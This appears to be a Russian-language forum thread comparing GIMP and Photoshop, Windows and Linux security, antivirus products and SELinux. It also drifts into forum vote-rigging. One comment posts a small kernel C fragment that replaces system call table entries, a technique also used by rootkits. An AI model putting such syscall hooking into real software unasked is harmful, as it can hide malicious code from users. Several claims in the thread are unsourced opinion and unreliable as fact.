http://www.progimp.ru/articles/salute/
http://www.progimp.ru/articles/idealnaya_kozha/А так же удобными, для работы со слоями, плагинами?
http://registry.gimp.org/node/11742
Про недостатки, в принципе, понятно:1. Нет поддержки плашечных цветов (несколько ограничивает профессиональную применимость, по большей части web-дизайном)
2. 8 битов на канал (но для домашнего/фото применения решается с помощью UFraw)Итого, не вижу причин, кроме предубеждения и vendor-lock по использованию Photoshop вместо Gimp, не профи (любителями) у которых нет фотопринтера.
В Windows если есть уязвимости, никакой антивирус не поможет. Бреши в безопасности системы не защищаются антивирусами.
Потом, недавно Red Hat выдавала отчет о том, сколько уязвимостей быо найдео в основных компонентах в RHEL начиная с версии 4. Статистика была в виде "уязвимостей/из них критических". 70% критических было найдено в продуктах компании Mozilla. В ядре Linux было 0 критических и несколько десятков не критических.
>В Windows если есть уязвимости, никакой антивирус не поможет. Бреши в безопасности
>системы не защищаются антивирусами.
>Потом, недавно Red Hat выдавала отчет о том, сколько уязвимостей быо найдео
>в основных компонентах в RHEL начиная с версии 4. Статистика была
>в виде "уязвимостей/из них критических". 70% критических было найдено в продуктах
>компании Mozilla. В ядре Linux было 0 критических и несколько десятков
>не критических.Я сидел как то 2 года на WinXP (с 2006 по 2008) без каких либо проблем вообще. Лишь изредка проверял антивирусом и за всё время пару раз лишь пару "карасей" находилось. Ну когда ходил на "небезопасные зоны" на компе, врубал антивирь. Также были как-то неудачные попытки сетевой атаки ("брандмауэр" Виндоуса сам их отбил). Потом продал свой старый комп и купил ноутбук, с предустановленной Вистой с СП1. Который, как оказалось, перегревал винчестер и, в конце концов, тот полетел, но до тех пор, почти год как, заметных проблем также не наблюдалось и ни переустанавливать, ни восстанавливать не приходилось.
Не перегибайте палку, Зенитар. И давайте тут обсуждать FOSS, которого и касаются новости, а не заниматься флудингом про МСы - так делу не поможете. К тому же все и так в курсе насчёт ядра Линукс, хотите высказаться - лучше регайтесь на форумах "вендузятников" и при случае расписывайте решения (и преимущества) известного хорошего (не абы какого, чтоб не отпугнуть!) FOSS. В смысле, чтоб понимали какие свободные альтернативы и замены. И как вести себя желательно (культурные традиции, обычаи, этикет...) в мире FOSS. Вот.
Ты принимаешь любителя Linux-систем как неадекватного фанатика, рекламирующего Linux везде где можно и нельзя? Зря. Я почему-то вижу всё наоборот.
>Кстати, для Linux локальная IDS/network control а-ля Kaspersky Internet Security
> очень бы не помешал - так было бы легко отслеживать локальные приложения, которые
>стали себя некорректно вести (читай - ломиться в сеть без надобности),Pavlinux Internet SeCUrity (PICSU) :)
int syscall_replace(int call_number, unsigned new_function)
{
spinlock_t replace_lock = SPIN_LOCK_UNLOCKED;if ((call_number <= 0) | (call_number >= NR_syscalls) | (new_sct == NULL))
return -EINVAL;if (new_function != 0) {
spin_lock_irq(&replace_lock);
new_sct[call_number] = new_function;
spin_unlock_irq(&replace_lock);
}return 0;
}
EXPORT_SYMBOL(syscall_replace);Списки доступа, фильтрование сискалов, логирование и блокировку сами допилите...
Прямо смешно - где тут behavioural analysis, sandboxing, file system monitor with rollback?Вы перед кем пытались выпендриться? Или вы думаете, что в Kasperksy сидят макаки, которые пишут скринсейверы?
>Прямо смешно - где тут
> behavioural analysis,юзай grep | sed | awk | tr | head | cut | perl
> sandboxing,chroot
> file system monitor with rollback?
BTRFS
И вообще, ключевые слова syscall replace :)
> Или вы думаете, что в Kasperksy сидят макаки, которые пишут скринсейверы?
Да мне как-то на них..., а нас рать.
а inotify для кого придумали?зы:
а каспер со своим доп ntfs-потоком к каждому файлу задолбал. порой только с помощью ntfs-3g выкарчевать и можно.
>а inotify для кого придумали?
>
>зы:
>а каспер со своим доп ntfs-потоком к каждому файлу задолбал. порой только
>с помощью ntfs-3g выкарчевать и можно.Пробовали читать документацию? NTFS streams в Kasperksy отключается за 3 секунды - замедления работы при этом не замечено.
не только пробовал читать документацию, но еще и на практике пытался освободить место от шлака после.
>а inotify для кого придумали?
>
>зы:
>а каспер со своим доп ntfs-потоком к каждому файлу задолбал. порой только
>с помощью ntfs-3g выкарчевать и можно.inotify
1) не работает рекурсивно
2) вы НЕ будете читать его вывод и отслеживать аномалии в работе FS - просто потому что inotify - это утилита, а не рабочий комплекс по защите
inotify - это не утилита.
inotifywait и inotifywatch - вот это утилиты.
http://ru.wikipedia.org/wiki/Inotify
>inotify — это подсистема ядра Linux, которая позволяет получать уведомления об изменениях в файловой системе.разницу улавливаете?
>а не рабочий комплекс по защитеа clamav+inotify+iptables+selinux+... - это конечно нифига не рабочий комплекс по защите.
ведь задача "правильного" админа - купить, щёлкнуть пару раз мышой, ввести код - всё.
задача по защите выполнена.
Павел, вы смешны.Вы кидаетесь заготовками, предлагая их как решение для конечного пользователя, а 96% пользователей компьютера мыслят как секретутки и тупо тыкают по кнопочкам, не зная таких умных слов как: grep | sed | awk | tr | head | cut | perl, chroot, BTRFS. Я и на 100% уверен, что вы, например, предложив всё это, сами никогда этого делать не будете - т.о. все ваши предложения - ПРОФАНАЦИЯ в чистом виде.
Даже для меня набор ваших заготовок никак не тянет на законченный, рабочий и готовый к употреблению продукт по защите рабочей станции на Linux (я да, меня смущает отсутствие подобных инструментов).
Т.о. мы имеем два вывода: пользователи Linux надеятся, что в open source никто не закинет закладок и уповают на Бога, не видя, что реально происходит с их компьютером (сколько пользователей будут настраивать логгирование в iptables? по секрету скажу - меньше 1%, сколько будут постоянно анализировать трафик на предмет странного поведения? - по секрету скажу - меньше 0.1%, сколько пользователей могут анализировать исходники, чтобы устранять в них уязвимости? lim -> 0).
Пользователи ненавистной на opennet Windows имеют хотя бы базовую защиту от большого количества разнообразной заразы, благодаря завершённым продуктам, которые _контролируют_ работу неизвестных приложений.
И да, вы всегда можете настроить stateful firewall на iptables и читать Интернет через
telnet server.com 80
GET /page HTTP/1.0
Host: server.comТолько не все люди умеют читать HTML и 99.999999% предпочитают веб браузеры.
Иногда за решения нужно платить.
>Т.о. мы имеем два вывода: пользователи Linux надеятся, что в open source никто не закинет закладок и уповают на Бога, не видя, что реально происходит с их компьютером (сколько пользователей будут настраивать логгирование в iptables? по секрету скажу - меньше 1%, сколько будут постоянно анализировать трафик на предмет странного поведения? - по секрету скажу - меньше 0.1%, сколько пользователей могут анализировать исходники, чтобы устранять в них уязвимости? lim -> 0).
>
>Пользователи ненавистной на opennet Windows имеют хотя бы базовую защиту от большого
>количества разнообразной заразы, благодаря завершённым продуктам, которые _контролируют_ работу неизвестных приложений.Посылка в корне неверна, кто имеет знания и опыт может проверять сам код используемого софта, кто не имеет знаний, опыта или желания проверять кучу кода - >>доверяет<< это дело изготовителю дистрибутива, а тот уже проверяет код в своем репозитории. То есть надеется на авось не пользователь Linux, а лопух, которому все равно что, но чтоб красиво и/или модно.
> на 100% уверен, что вы, например, предложив всё это, сами никогда этого делать не будетеКонечно не буду, а за бабло, на продажу другим, буду :)
>Программа отлично подходит для LiveCD для восстановления/лечения убитых Windows партиций, так что
>не понимаю почему все так кипятятся.
>
>Кстати, для Linux локальная IDS/network control а-ля Kaspersky Internet Security очень бы
>не помешал - так было бы легко отслеживать локальные приложения, которые
>стали себя некорректно вести (читай - ломиться в сеть без надобности),IDS для десктопа это слишком круто (они, кстати, тоже есть, от OpenSource и бесплатных, до IDS с ценниками в тысячи $), на Windows нужны исключительно по тому, что на ней для защиты используются технологии 70-х годов (дискрицеонный контроль доступа, UAC) и 90-х (ролевая модель AD, и антивирусы), ничего нового MS не может придумать(или скопировать у Linux) уже несколько лет.
При наличии настроенного SELinux или apparmor необходимости в IDS дома нет, как и в CRM-системе вместо электронной таблицы :)
>При наличии настроенного SELinux или apparmor необходимости в IDS дома нетЛюди, поднимите руку, кому пригодился хоть раз SELinux или apparmor ???
>Люди, поднимите руку, кому пригодился хоть раз SELinux или apparmor ???Не знаю как пригодился, но вот какой геморрой от них был я запомнил навсегда, несколько раз очень долго приходилось разбираться в причинах глюков, прежде чем стало ясно, что они следствие ограничений SELinux. Но стоит заметить, что эти глюки были в основном кода делались шаги вправо или влево от заложенной в дистрибутив линии партии.
>>При наличии настроенного SELinux или apparmor необходимости в IDS дома нет
>
>Люди, поднимите руку, кому пригодился хоть раз SELinux или apparmor ???Я искренне надеюсь, что никогда не пригодится. Или, хотя бы не раньше того времени, когда мы сделаем нормальный мониторинг аудит-событий
Товарищ birdie, я говорил про почту, которую берут linux юзвери. Забирайте свои слова обратно. NOD хороший антивирь для слабых машин (до сих пор используем его на 98 виндах), для которого до сих пор обновления выходят.
>Товарищ birdie, я говорил про почту, которую берут linux юзвери. Забирайте свои
>слова обратно. NOD хороший антивирь для слабых машин (до сих пор
>используем его на 98 виндах), для которого до сих пор обновления
>выходят.Для слабых машин хорошы ЛЮБЫЕ антивирусы кроме Касперского (только он один "отличился" по скорости проверки и замораживаниям всей системы), а какой лучший - решение неоднозначное и сильно зависящее от ситуации.
Лично мне НОД не симпатизирует (его "интелектуальные эвристики" под Виндой способны "отыскивать" "страшные угрозы" даже в WHQL-сертифицированных драйверах, сборках Win PE, которые я САМ для себя делал, самораспаковывающихся (SFX) архивах и т.д.), так же как и хвалённая где-то Панда (думал что хорошая, пока не оказалось 5 вирусов после неё, найденных повсюду обсираемым Авастом - вот после него Касперские и НОДы уже ничего не находили).
Это я всё про Винду, а в Лине антивирь как то и не пользовал (хотя надо бы проверить WINE и флешки, ЛОЛ :))
>только он один "отличился" по скорости проверки и замораживаниям всей системыИ качеством поиска вирусов тоже. Сейчас ЛК - мировой лидер.
>>только он один "отличился" по скорости проверки и замораживаниям всей системы
>
>И качеством поиска вирусов тоже. Сейчас ЛК - мировой лидер.ЛК это что?
>>>только он один "отличился" по скорости проверки и замораживаниям всей системы
>>
>>И качеством поиска вирусов тоже. Сейчас ЛК - мировой лидер.
>
>ЛК это что?Меня одна подруга, неглупый в общем-то человек, давеча спросила: «А что, Израиль — это страна?», — долго думал над ответом…
>>>>только он один "отличился" по скорости проверки и замораживаниям всей системы
>>>
>>>И качеством поиска вирусов тоже. Сейчас ЛК - мировой лидер.
>>
>>ЛК это что?
>
>Меня одна подруга, неглупый в общем-то человек, давеча спросила: «А что, Израиль
>— это страна?», — долго думал над ответом…Вывод: Одна не знает, другой долго думает. Что в итоге решили-то? Ж:)
>>>>>только он один "отличился" по скорости проверки и замораживаниям всей системы
>>>>
>>>>И качеством поиска вирусов тоже. Сейчас ЛК - мировой лидер.
>>>
>>>ЛК это что?
>>
>>Меня одна подруга, неглупый в общем-то человек, давеча спросила: «А что, Израиль
>>— это страна?», — долго думал над ответом…
>
>Вывод: Одна не знает, другой долго думает. Что в итоге решили-то? Ж:):-D Что одесситы и евреи всё-таки отличаются.
>ЛК это что?Каборатория Ласперского.
Но даже нод не всегда спасает (особенно на 98 виндах) - приходится вычищать каспером или нодом 4 версии, который таки выводит заразу, не удаляя сам документ.
>Но даже нод не всегда спасает (особенно на 98 виндах) - приходится
>вычищать каспером или нодом 4 версии, который таки выводит заразу, не
>удаляя сам документ.А вообще интересная мысль: извратиться и накатить на компы древнюю винду с древним офисом, под которыми современные вирусы тупо не запустятся…
А какой профит?
>А какой профит?+150 ЧСК
>А какой профит?Да уж, таким макаром - лучше современный Линь + современный Вайн + кой нить антивирь "ради баера" (ClamAV сойдёт ток так))
Забавно, как некоторые товарищи трепетно относятся к своей репутации, и усердно плюсуют себя и минусуют все посты оппонента. Ну не бывает так, чтобы все вместе одновременно все более-менее адекватные посты одного человека одинаково оценивали. :))) Трухин, берегитесь, мы с birdie догоняем!!!2 Максим Чирков: Кстати, если не секрет, а зачем можно голосовать за себя? Я понимаю, что это скорее баловство, но всё же. Лучше бы, наверное, вообще запретить голосовать за посты, сделанные с того же IP-адреса — на объективность голосов это повлияет исключительно в лучшую сторону.
>Самое забавное, что большинство минуюсущих здесь - яростные пользователи пиратской Windows 7 Ultimate, которые запускают Ubuntu в ворованной VMWare WorkStation.
Прежде, чем начинать меня минусовать (я надеюсь, это сообщение получит -20), посмотрите статистику по ОС сайтов opennet.ru и linux.org.ru.
PS Я пользуюсь Линуксом с 1998 года, эксклюзивно с 2000 года. Но вы минусуйте меня дальше :)
>Лучше бы, наверное, вообще запретить голосовать за посты, сделанные с того же IP-адреса...Не надо перегибать палку - вы забываете про NAT-ы и подобное. Сессиями надо оценивать, а не IP-адресами. Кстати, много где используется - разрешать оценки только после логина - очень эффективно.
>>Лучше бы, наверное, вообще запретить голосовать за посты, сделанные с того же IP-адреса...
>
>Не надо перегибать палку - вы забываете про NAT-ы и подобное.
>Сессиями надо оценивать, а не IP-адресами. Кстати, много где используется
>- разрешать оценки только после логина - очень эффективно.Как раз про NAT'ы я помню. Люди за NAT'ом обычно образуют сообщество с едиными взглядами, и нередко один находит «отстойный» пост, показывает остальным, и все дружно минусуют «за компанию» (ну или наоборот). Как вариант — пошёл, с десктопа проголосовал, с ноутбука (подключённого к тому же провайдеру) проголосовал, с КПК-шки (имеющей коннект с ноутом) проголосовал…
А вот насчёт эффективности оценок только после логина — это эффективный способ уменьшить количество оценок как таковых, но не более. Ничто не мешает озабоченному — именно из-за таких фонатегов онлайн-рейтинги и представляют обычно собой сферического коня в вакууме — завести несколько учёток и переключаться. Нормальный человек такого делать не станет, да — ну так нормальный человек и накрутками не занимается.
Множество людей сидит за НАТ провайдера, например Йота, так что, все пользователи Йоты "образуют сообщество с едиными взглядами". Так что с АйПи это вы погорячились.ЗЫ "именно из-за таких фонатегов онлайн-рейтинги и представляют обычно собой сферического коня в вакууме"
Есть говорят в инетах извращенцы - рейтингасты, после их шабаша форумы виснут, сервера падают и вообще - крокодил не ловится и сплошная проблема понедельника 2012.